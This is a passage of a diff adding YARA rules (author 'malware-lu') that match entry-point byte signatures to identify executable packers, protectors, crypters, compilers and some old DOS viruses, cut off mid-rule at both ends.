+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv50
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 44 56 FF 15 70 61 44 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C 3C 20 7E 08 8A 46 01 46 3C 20 7F F8 8A 06 84 C0 74 0C 3C 20 7F 08 8A 46 01 46 84 C0 75 F4 8D 44 24 04 C7 44 24 30 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IDApplicationProtector12IDSecuritySuite
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F2 0B 47 00 B9 19 22 47 00 81 E9 EA 0E 47 00 89 EA 81 C2 EA 0E 47 00 8D 3A 89 FE 31 C0 E9 D3 02 00 00 CC CC CC CC E9 CA 02 00 00 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 6F 66 74 57 61 72 65 50 72 6F 74 65 63 74 6F 72 5C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4ExtractablePasswordchecking
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 80 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HASPHLProtectionV1XAladdin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 }
+	$a1 = { 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 15 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule ASProtectv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov275a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 68 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner0132Lite003Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxDoom666
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? 5E 83 EE ?? B8 CF 7B CD 21 3D CF 7B ?? ?? 0E 1F 81 C6 ?? ?? BF ?? ?? B9 ?? ?? FC F3 A4 06 1F 06 B8 ?? ?? 50 CB B4 48 BB 2C 00 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSpanz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 5E 81 EE ?? ?? 8D 94 ?? ?? B4 1A CD 21 C7 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100DLLLZBRSBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pksmart10b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? 8C C8 8B C8 03 C2 81 ?? ?? ?? 51 B9 ?? ?? 51 1E 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockv106
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LaunchAnywherev4001
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 83 EC 48 55 B8 FF FF FF FF 50 50 68 E0 3E 42 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 C0 69 44 00 E8 E4 80 FF FF 59 E8 4E 29 00 00 E8 C9 0D 00 00 85 C0 75 08 6A FF E8 6E 2B 00 00 59 E8 A8 2C 00 00 E8 23 2E 00 00 FF 15 4C C2 44 00 89 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv033v034BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GameGuardnProtect
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE ?? ?? ?? ?? 31 FF 74 06 61 E9 4A 4D 50 30 8D BE ?? ?? ?? ?? 31 C9 74 06 61 E9 4A 4D 50 30 B8 7D 00 00 00 39 C2 B8 4C 00 00 00 F7 D0 75 3F 64 A1 30 00 00 00 85 C0 78 23 8B 40 0C 8B 40 0C C7 40 20 00 10 00 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 85 C0 75 16 E9 12 00 00 00 31 C0 64 A0 20 00 00 00 85 C0 75 05 E9 01 00 00 00 61 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV1032AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 94 73 42 00 8B D5 81 C2 E3 73 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 BF A4 42 00 81 E9 8E 74 42 00 8B D5 81 C2 8E 74 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 63 29 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nBinderv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5C 6E 62 34 5F 74 6D 70 5F 30 31 33 32 34 35 34 33 35 30 5C 00 00 00 00 00 00 00 00 00 E9 55 43 4C FF 01 1A 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 8F F4 6A 70 35 A5 63 E9 A3 95 64 9E 32 88 DB 0E A4 B8 DC 79 }
+
+condition:
+		$a0
+}
+	
+	
+rule AnslymFUDCrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EPExEPackV10EliteCodingGroup
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack12build3009Method2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 86 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule WinZip32bitSFXv6xmodule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 15 ?? ?? ?? 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 38 08 74 06 40 80 38 00 75 F6 80 38 00 74 01 40 33 C9 ?? ?? ?? ?? FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEinstein
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 42 CD 21 72 31 B9 6E 03 33 D2 B4 40 CD 21 72 19 3B C1 75 15 B8 00 42 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VideoLanClient
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv10xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 09 C6 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTravJack883
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 9C 9E 26 ?? ?? 51 04 ?? 7D ?? 00 ?? 2E ?? ?? ?? ?? 8C C8 8E C0 8E D8 80 ?? ?? ?? ?? 74 ?? 8A ?? ?? ?? BB ?? ?? 8A ?? 32 C2 88 ?? FE C2 43 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RSCsProcessPatcherv151
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 20 40 00 E8 C3 01 00 00 80 38 00 74 0D 66 81 78 FE 22 20 75 02 EB 03 40 EB EE 8B F8 B8 04 60 40 00 68 C4 20 40 00 68 D4 20 40 00 6A 00 6A 00 6A 04 6A 00 6A 00 6A 00 57 50 E8 9F 01 00 00 85 C0 0F 84 39 01 00 00 BE 00 60 40 00 8B 06 A3 28 21 40 00 83 }
+
+condition:
+		$a0
+}
+	
+	
+rule kryptor9
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5E B9 ?? ?? ?? ?? 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SecuPackv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 CC 3A 40 ?? E8 E0 FC FF FF 33 C0 55 68 EA 3C 40 ?? 64 FF 30 64 89 20 6A ?? 68 80 ?? ?? ?? 6A 03 6A ?? 6A 01 ?? ?? ?? 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kryptor5
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 ?? ?? ?? E9 EB 6C 58 40 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kryptor6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 ?? ?? ?? E9 EB 68 58 33 D2 74 02 E9 E9 40 42 75 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectV13Xrisco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 50 E8 01 00 00 00 75 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv202c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MinGWGCC2xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeBASIC016b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 88 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 68 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16bv16cVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 }
+	$a1 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FileShield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 1E EB ?? 90 00 00 8B D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDC12SelfDecryptingBinaryGeneratorbyClaesMNyberg
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 A0 91 40 00 E8 DB FE FF FF 55 89 E5 53 83 EC 14 8B 45 08 8B 00 8B 00 3D 91 00 00 C0 77 3B 3D 8D 00 00 C0 72 4B BB 01 00 00 00 C7 44 24 04 00 00 00 00 C7 04 24 08 00 00 00 E8 CE 24 00 00 83 F8 01 0F 84 C4 00 00 00 85 C0 0F 85 A9 00 00 00 31 C0 83 C4 14 5B 5D C2 04 00 3D 94 00 00 C0 74 56 3D 96 00 00 C0 74 1E 3D 93 00 00 C0 75 E1 EB B5 3D 05 00 00 C0 8D B4 26 00 00 00 00 74 43 3D 1D 00 00 C0 75 CA C7 44 24 04 00 00 00 00 C7 04 24 04 00 00 00 E8 73 24 00 00 83 F8 01 0F 84 99 00 00 00 85 C0 74 A9 C7 04 24 04 00 00 00 FF D0 B8 FF FF FF FF EB 9B 31 DB 8D 74 26 00 E9 69 FF FF FF C7 44 24 04 00 00 00 00 C7 04 24 0B 00 00 00 E8 37 24 00 00 83 F8 01 74 7F 85 C0 0F 84 6D FF FF FF C7 04 24 0B 00 00 00 8D 76 00 FF D0 B8 FF FF FF FF E9 59 FF FF FF C7 04 24 08 00 00 00 FF D0 B8 FF FF FF FF E9 46 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 08 00 00 00 E8 ED 23 00 00 B8 FF FF FF FF 85 DB 0F 84 25 FF FF FF E8 DB 15 00 00 B8 FF FF FF FF E9 16 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 04 00 00 00 E8 BD 23 00 00 B8 FF FF FF FF E9 F8 FE FF FF C7 44 24 04 01 00 00 00 C7 04 24 0B 00 00 00 E8 9F 23 00 00 B8 FF FF FF FF E9 DA FE FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv1501
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 ?? BA ?? ?? CD 21 B8 ?? ?? CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Inbuildv10hard
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? BB ?? ?? 2E ?? ?? 2E ?? ?? 43 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 65 78 65 73 68 6C 2E 64 6C 6C C0 5D 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv20Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? 02 00 00 F7 D1 83 F1 FF 59 BA 32 21 ?? 00 F7 D1 83 F1 FF F7 D1 83 F1 FF 80 02 E3 F7 D1 83 F1 FF C0 0A 05 F7 D1 83 F1 FF 80 02 6F F7 D1 83 F1 FF 80 32 A4 F7 D1 83 F1 FF 80 02 2D F7 D1 83 F1 FF 42 49 85 C9 75 CD 1C 4F 8D 5B FD 62 1E 1C 4F 8D 5B FD 4D 9D B9 ?? ?? ?? 1E 1C 4F 8D 5B FD 22 1C 4F 8D 5B FD 8E A2 B9 B9 E2 83 DB E2 E5 4D CD 1E BF 60 AB 1F 4D DB 1E 1E 3D 1E 92 1B 8E DC 7D EC A4 E2 4D E5 20 C6 CC B2 8E EC 2D 7D DC 1C 4F 8D 5B FD 83 56 8E E0 3A 7D D0 8E 9D 6E 7D D6 4D 25 06 C2 AB 20 CC 3A 4D 2D 9D 6B 0B 81 45 CC 18 4D 2D 1F A1 A1 6B C2 CC F7 E2 4D 2D 9E 8B 8B CC DE 2E 2D F7 1E AB 7D 45 92 30 8E E6 B9 7D D6 8E 9D 27 DA FD FD 1E 1E 8E DF B8 7D CF 8E A3 4D 7D DC 1C 4F 8D 5B FD 33 D7 1E 1E 1E A6 0B 41 A1 A6 42 61 6B 41 6B 4C 45 1E 21 F6 26 BC E2 62 1E 62 1E 62 1E 23 63 59 ?? 1E 62 1E 62 1E 33 D7 1E 1E 1E 85 6B C2 41 AB C2 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 20 33 9E 1E 1E 1E 85 A2 0B 8B C2 27 41 EB A1 A2 C2 1E C0 FD F0 FD 30 62 1E 33 7E 1E 1E 1E C6 2D 42 AB 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 C0 FD F0 8E 1D 1C 4F 8D 5B FD E0 00 33 5E 1E 1E 1E BF 0B EC C2 E6 42 A2 C2 45 1E C0 FD F0 FD 30 CE 36 CC F2 1C 4F 8D 5B FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv125
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? F3 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv1Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 }
+	$a1 = { 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PECompactv122
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 ?? 70 40 ?? 90 90 01 85 9E 70 40 ?? BB F3 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packmanv10BrandonLaCombe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA 8B E8 C6 06 E9 8B 43 0C 89 46 01 6A 04 68 00 10 00 00 FF 73 08 51 FF 55 08 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SpecialEXEPaswordProtectorV101EngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSmashervxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C FE 03 ?? 60 BE ?? ?? 41 ?? 8D BE ?? 10 FF FF 57 83 CD FF EB 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor046ChinaCrackingGroup
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VMProtect106107PolyTech
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }
+
+condition:
+		$a0
+}
+	
+	
+rule USSR031bySpirit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 83 C5 12 55 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 8C C9 30 C9 E3 01 C3 BE 32 ?? ?? ?? B0 ?? 30 06 8A 06 46 81 FE 00 ?? ?? ?? 7C F3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PeCompact253DLLSlimLoaderBitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 00 08 0C 00 48 E1 01 56 57 53 55 8B 5C 24 1C 85 DB 0F 84 AB 21 E8 BD 0E E6 60 0D 0B 6B 65 72 6E 6C 33 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LameCryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 66 9C BB ?? ?? ?? ?? 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Cygwin32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 04 83 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv123RC4build0807exeAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov210b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 18 12 41 00 68 24 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 10 F2 40 00 68 64 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorProtection150XCGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 EB 01 ?? ?? ?? ?? 83 EC 0C 53 56 57 EB 01 ?? 83 3D ?? ?? ?? ?? 00 74 08 EB 01 E9 E9 56 01 00 00 EB 02 E8 E9 C7 05 ?? ?? ?? ?? 01 00 00 00 EB 01 C2 E8 E2 05 00 00 EB 02 DA 9F 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF D0 59 59 EB 01 C8 EB 02 66 F0 68 ?? ?? ?? ?? E8 0E 05 00 00 59 EB 01 DD 83 65 F4 00 EB 07 8B 45 F4 40 89 45 F4 83 7D F4 61 73 1F EB 02 DA 1A 8B 45 F4 0F ?? ?? ?? ?? ?? ?? 33 45 F4 8B 4D F4 88 ?? ?? ?? ?? ?? EB 01 EB EB }
+
+condition:
+		$a0
+}
+	
+	
+rule VxNecropolis1963
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 3C 03 ?? ?? B8 00 12 CD 2F 3C FF B8 ?? ?? ?? ?? B4 4A BB 40 01 CD 21 ?? ?? FA 0E 17 BC ?? ?? E8 ?? ?? FB A1 ?? ?? 0B C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? 50 9C FC BE ?? ?? 8B FE 8C C8 05 ?? ?? 8E C0 06 57 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02UPX06Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinV071cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XHider10GlobaL
+{
+      meta:
+		author="malware-lu"
